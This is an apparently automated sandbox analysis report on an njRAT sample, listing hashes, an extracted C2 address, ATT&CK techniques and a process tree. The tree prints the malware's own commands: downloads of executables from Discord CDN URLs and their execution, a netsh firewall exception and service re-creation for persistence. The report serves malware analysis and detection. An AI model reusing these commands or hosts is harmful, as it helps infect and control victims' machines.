njrat | 0cc7d034e9b01b5f02d0843e62c5ce0c79dc380fc3c126be71c8ad31ab8acad6

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-en-20211104
submitted
27-11-2021 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe
Size

355KB
MD5

23fb23c32c346850115102c7c51d59a0
SHA1

10d8d48501447675facadf07a656aaa9668cad5a
SHA256

0cc7d034e9b01b5f02d0843e62c5ce0c79dc380fc3c126be71c8ad31ab8acad6
SHA512

8b0bd3919f9d122b02e21e33569b391f2fecb015a3a766f3c551fb9a3d2c9f8d0a5273a79532295744a0038f519a31bd0be95bdf24f0f83ce605ff43c3496f1c

Score

10^/10

njrat 1 evasion persistence suricata trojan upx

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

6.tcp.ngrok.io:14955

Mutex

278143857c93c64cb35ca3ab3e71ff74

Attributes

reg_key
278143857c93c64cb35ca3ab3e71ff74
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

extd.exeextd.exeextd.exe666.exeextd.exesetup.exeextd.exegpue.exeserver.exe

pid process

512 extd.exe
1920 extd.exe
856 extd.exe
536 666.exe
776 extd.exe
1804 setup.exe
1416 extd.exe
1616 gpue.exe
1200 server.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
512	extd.exe
1920	extd.exe
856	extd.exe
536	666.exe
776	extd.exe
1804	setup.exe
1416	extd.exe
1616	gpue.exe
1200	server.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe	upx

Loads dropped DLL 7 IoCs

Processes:

setup.exe666.exe

pid process

1804 setup.exe
1804 setup.exe
1804 setup.exe
1804 setup.exe
1804 setup.exe
1804 setup.exe
536 666.exe
Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Drops file in Windows directory 5 IoCs

Processes:

setup.exegpue.execmd.exe

description	ioc	process
File created	C:\Windows\parameters.ini	setup.exe
File created	C:\Windows\proceslist.txt	setup.exe
File created	C:\Windows\gpue.exe	setup.exe
File opened for modification	C:\Windows\parameters.ini	gpue.exe
File created	C:\Windows\gpu_name.txt	cmd.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\24412\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\24412\setup.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\24412\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\24412\setup.exe	nsis_installer_2

Modifies data under HKEY_USERS 1 IoCs

Processes:

WMIC.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe
Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 7 IoCs

Processes:

extd.exeextd.exeextd.exe666.exeextd.exesetup.exeextd.exe

pid process

512 extd.exe
1920 extd.exe
856 extd.exe
536 666.exe
776 extd.exe
1804 setup.exe
1416 extd.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

pid	process
512	extd.exe
1920	extd.exe
856	extd.exe
536	666.exe
776	extd.exe
1804	setup.exe
1416	extd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exegpue.exeserver.exe

pid	process
1804	setup.exe
1804	setup.exe
1804	setup.exe
1804	setup.exe
1804	setup.exe
1804	setup.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1616	gpue.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe
1200	server.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

server.exe

pid process

1200 server.exe

pid	process
1200	server.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

gpue.exeWMIC.exeserver.exe

description	pid	process
Token: SeDebugPrivilege	1616	gpue.exe
Token: SeAssignPrimaryTokenPrivilege	1548	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1548	WMIC.exe
Token: SeSecurityPrivilege	1548	WMIC.exe
Token: SeTakeOwnershipPrivilege	1548	WMIC.exe
Token: SeLoadDriverPrivilege	1548	WMIC.exe
Token: SeSystemtimePrivilege	1548	WMIC.exe
Token: SeBackupPrivilege	1548	WMIC.exe
Token: SeRestorePrivilege	1548	WMIC.exe
Token: SeShutdownPrivilege	1548	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1548	WMIC.exe
Token: SeUndockPrivilege	1548	WMIC.exe
Token: SeManageVolumePrivilege	1548	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1548	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1548	WMIC.exe
Token: SeSecurityPrivilege	1548	WMIC.exe
Token: SeTakeOwnershipPrivilege	1548	WMIC.exe
Token: SeLoadDriverPrivilege	1548	WMIC.exe
Token: SeSystemtimePrivilege	1548	WMIC.exe
Token: SeBackupPrivilege	1548	WMIC.exe
Token: SeRestorePrivilege	1548	WMIC.exe
Token: SeShutdownPrivilege	1548	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1548	WMIC.exe
Token: SeUndockPrivilege	1548	WMIC.exe
Token: SeManageVolumePrivilege	1548	WMIC.exe
Token: SeDebugPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe
Token: 33	1200	server.exe
Token: SeIncBasePriorityPrivilege	1200	server.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

gpue.exe

pid process

1616 gpue.exe

pid	process
1616	gpue.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.execmd.exesetup.execmd.exenet.execmd.execmd.exe

description	pid	process	target process
PID 2032 wrote to memory of 560	2032	0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe	cmd.exe
PID 2032 wrote to memory of 560	2032	0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe	cmd.exe
PID 2032 wrote to memory of 560	2032	0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe	cmd.exe
PID 2032 wrote to memory of 560	2032	0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe	cmd.exe
PID 560 wrote to memory of 512	560	cmd.exe	extd.exe
PID 560 wrote to memory of 512	560	cmd.exe	extd.exe
PID 560 wrote to memory of 512	560	cmd.exe	extd.exe
PID 560 wrote to memory of 512	560	cmd.exe	extd.exe
PID 560 wrote to memory of 1920	560	cmd.exe	extd.exe
PID 560 wrote to memory of 1920	560	cmd.exe	extd.exe
PID 560 wrote to memory of 1920	560	cmd.exe	extd.exe
PID 560 wrote to memory of 1920	560	cmd.exe	extd.exe
PID 560 wrote to memory of 856	560	cmd.exe	extd.exe
PID 560 wrote to memory of 856	560	cmd.exe	extd.exe
PID 560 wrote to memory of 856	560	cmd.exe	extd.exe
PID 560 wrote to memory of 856	560	cmd.exe	extd.exe
PID 560 wrote to memory of 536	560	cmd.exe	666.exe
PID 560 wrote to memory of 536	560	cmd.exe	666.exe
PID 560 wrote to memory of 536	560	cmd.exe	666.exe
PID 560 wrote to memory of 536	560	cmd.exe	666.exe
PID 560 wrote to memory of 776	560	cmd.exe	extd.exe
PID 560 wrote to memory of 776	560	cmd.exe	extd.exe
PID 560 wrote to memory of 776	560	cmd.exe	extd.exe
PID 560 wrote to memory of 776	560	cmd.exe	extd.exe
PID 560 wrote to memory of 1804	560	cmd.exe	setup.exe
PID 560 wrote to memory of 1804	560	cmd.exe	setup.exe
PID 560 wrote to memory of 1804	560	cmd.exe	setup.exe
PID 560 wrote to memory of 1804	560	cmd.exe	setup.exe
PID 560 wrote to memory of 1804	560	cmd.exe	setup.exe
PID 560 wrote to memory of 1804	560	cmd.exe	setup.exe
PID 560 wrote to memory of 1804	560	cmd.exe	setup.exe
PID 560 wrote to memory of 1416	560	cmd.exe	extd.exe
PID 560 wrote to memory of 1416	560	cmd.exe	extd.exe
PID 560 wrote to memory of 1416	560	cmd.exe	extd.exe
PID 560 wrote to memory of 1416	560	cmd.exe	extd.exe
PID 1804 wrote to memory of 1644	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 1644	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 1644	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 1644	1804	setup.exe	cmd.exe
PID 1644 wrote to memory of 1756	1644	cmd.exe	net.exe
PID 1644 wrote to memory of 1756	1644	cmd.exe	net.exe
PID 1644 wrote to memory of 1756	1644	cmd.exe	net.exe
PID 1644 wrote to memory of 1756	1644	cmd.exe	net.exe
PID 1756 wrote to memory of 1700	1756	net.exe	net1.exe
PID 1756 wrote to memory of 1700	1756	net.exe	net1.exe
PID 1756 wrote to memory of 1700	1756	net.exe	net1.exe
PID 1756 wrote to memory of 1700	1756	net.exe	net1.exe
PID 1804 wrote to memory of 764	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 764	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 764	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 764	1804	setup.exe	cmd.exe
PID 764 wrote to memory of 1940	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1940	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1940	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1940	764	cmd.exe	sc.exe
PID 1804 wrote to memory of 1956	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 1956	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 1956	1804	setup.exe	cmd.exe
PID 1804 wrote to memory of 1956	1804	setup.exe	cmd.exe
PID 1956 wrote to memory of 1208	1956	cmd.exe	sc.exe
PID 1956 wrote to memory of 1208	1956	cmd.exe	sc.exe
PID 1956 wrote to memory of 1208	1956	cmd.exe	sc.exe
PID 1956 wrote to memory of 1208	1956	cmd.exe	sc.exe
PID 1804 wrote to memory of 1964	1804	setup.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe
"C:\Users\Admin\AppData\Local\Temp\0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\B203.bat C:\Users\Admin\AppData\Local\Temp\0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:560

C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:512

C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1920

C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/877176601429819402/894631295047577621/666.exe" "666.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:856

C:\Users\Admin\AppData\Local\Temp\24412\666.exe
666.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:536

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
5⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/893540407105949760/893540461770317844/setup.exe" "setup.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:776

C:\Users\Admin\AppData\Local\Temp\24412\setup.exe
setup.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C net stop GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\SysWOW64\net.exe
net stop GPUService
5⤵
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop GPUService
6⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C Sc delete GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\SysWOW64\sc.exe
Sc delete GPUService
5⤵
PID:1940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C Sc create GPUService binpath= C:\Windows\gpue.exe start= auto DisplayName= GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\SysWOW64\sc.exe
Sc create GPUService binpath= C:\Windows\gpue.exe start= auto DisplayName= GPUService
5⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C sc description GPUService ServiceManagerForGPU
4⤵
PID:1964

C:\Windows\SysWOW64\sc.exe
sc description GPUService ServiceManagerForGPU
5⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C net start GPUService
4⤵
PID:1736

C:\Windows\SysWOW64\net.exe
net start GPUService
5⤵
PID:880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start GPUService
6⤵
PID:1880

C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe "" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1416

C:\Windows\gpue.exe
C:\Windows\gpue.exe
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1616

C:\Windows\SysWOW64\cmd.exe
cmd /c wmic path win32_VideoController get name > C:\Windows\gpu_name.txt
2⤵
- Drops file in Windows directory
PID:1544

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1548

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Privilege Escalation

New Service

T1050

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\24412\666.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
9aa19c858574c7ffc6c0bc66ed727dfa64d8d6b6b68c17bccf3cdd7ae5c86fe378480fd222d41a8bc82b896ca020ca95987f3b9788fbb5badd882c895c99fed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\24412\666.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
9aa19c858574c7ffc6c0bc66ed727dfa64d8d6b6b68c17bccf3cdd7ae5c86fe378480fd222d41a8bc82b896ca020ca95987f3b9788fbb5badd882c895c99fed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\24412\setup.exe
MD5
641eaf387f50008330a706b2998c10df

SHA1
513bfd94eb70d6e2d440d01139e96950f9d54b4c

SHA256
05f11e55137f85032b0297ee1911e09812e1c4f70871625c0e30685ad8d245c1

SHA512
d9250c6bc3fd1caae9dfb9ef582ae321cdc0cfe0fd1157346a33ba8395a8ed9cfc6895bd9cf5d71229538d3b8fb71c9a30853cc4670f0dc684cb53f352d58131

Download Submit
C:\Users\Admin\AppData\Local\Temp\24412\setup.exe
MD5
641eaf387f50008330a706b2998c10df

SHA1
513bfd94eb70d6e2d440d01139e96950f9d54b4c

SHA256
05f11e55137f85032b0297ee1911e09812e1c4f70871625c0e30685ad8d245c1

SHA512
d9250c6bc3fd1caae9dfb9ef582ae321cdc0cfe0fd1157346a33ba8395a8ed9cfc6895bd9cf5d71229538d3b8fb71c9a30853cc4670f0dc684cb53f352d58131

Download Submit
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\B203.bat
MD5
0f1fb0bf1b26d1baa8912c28e21cc29f

SHA1
8cbe5e030b353556395e52038acf7dd0d7ab4d42

SHA256
22b2278f445d59d180ab6a30a0cfb10a448dca221463ca2b820136a7c8fc5432

SHA512
22ded441877dfb5eca68038de30c8dc0c0767e4fae60a5706bc03432fcb8595b2a83b3e86ce75a27fa62487ddf2da450cadf9fa029ab25b223d588b81e6b3d82

Download Submit
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B201.tmp\B202.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
9aa19c858574c7ffc6c0bc66ed727dfa64d8d6b6b68c17bccf3cdd7ae5c86fe378480fd222d41a8bc82b896ca020ca95987f3b9788fbb5badd882c895c99fed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
9aa19c858574c7ffc6c0bc66ed727dfa64d8d6b6b68c17bccf3cdd7ae5c86fe378480fd222d41a8bc82b896ca020ca95987f3b9788fbb5badd882c895c99fed2

Download Submit
C:\Windows\gpue.exe
MD5
4f5546a65f13faa1552e34d301b03dfe

SHA1
47d430278d13f8d23d5d865777ca14ebf7bae296

SHA256
e172c632cd031235affc1ae38c1f18674eb069a80bba7c6358551247ed010061

SHA512
f8779f5f9bf5b776142b5d6e821bd2ed4a7618406f153d4d82cfb2ea80c4dd194b1ade72694388ad911ce1a3929f02a4cd62f347febfa15e4931e68f5f1bd5d9

Download Submit
C:\Windows\parameters.ini
MD5
a9e16c8820bc8ea84968c423771c42c1

SHA1
8a384cd91f77bc8c6a4408ea0dd0b0a4e9d6cd54

SHA256
2c78aef611fae9862278a6f5f0677686d2bdf911fa441a39b5f3bc0d028a7bc8

SHA512
71d9e01f34a625d3756580c03d8e520552ea4d68ce78ca3adf69594947014adb4ec0ccbfef1cc64b7f0961726baa69a083829ef87aadf71dd7dba9a65e29f114

Download Submit
C:\Windows\proceslist.txt
MD5
a6ed38248f19079a4503576153d91409

SHA1
0bbc351696d5fd8659f1f18c36195bd192869bc8

SHA256
e26ad6677297f6476356bb6c368c5f933165a16635c4bd6c2aad5e8d6784f5f5

SHA512
f064c6f52fe247cdb801bbcae07d1636dace09f8500460660472cb9918f75e92ebcf89c8b6aa45e7c830839a5aea323c310bf0c93d90f5d77242bb50aa86e31f

Download Submit
\Users\Admin\AppData\Local\Temp\nsnBC3E.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsnBC3E.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsnBC3E.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsnBC3E.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsnBC3E.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsnBC3E.tmp\nsProcess.dll
MD5
05450face243b3a7472407b999b03a72

SHA1
ffd88af2e338ae606c444390f7eaaf5f4aef2cd9

SHA256
95fe9d92512ff2318cc2520311ef9145b2cee01209ab0e1b6e45c7ce1d4d0e89

SHA512
f4cbe30166aff20a226a7150d93a876873ba699d80d7e9f46f32a9b4753fa7966c3113a3124340b39ca67a13205463a413e740e541e742903e3f89af5a53ad3b

Download Submit
\Users\Admin\AppData\Local\Temp\server.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
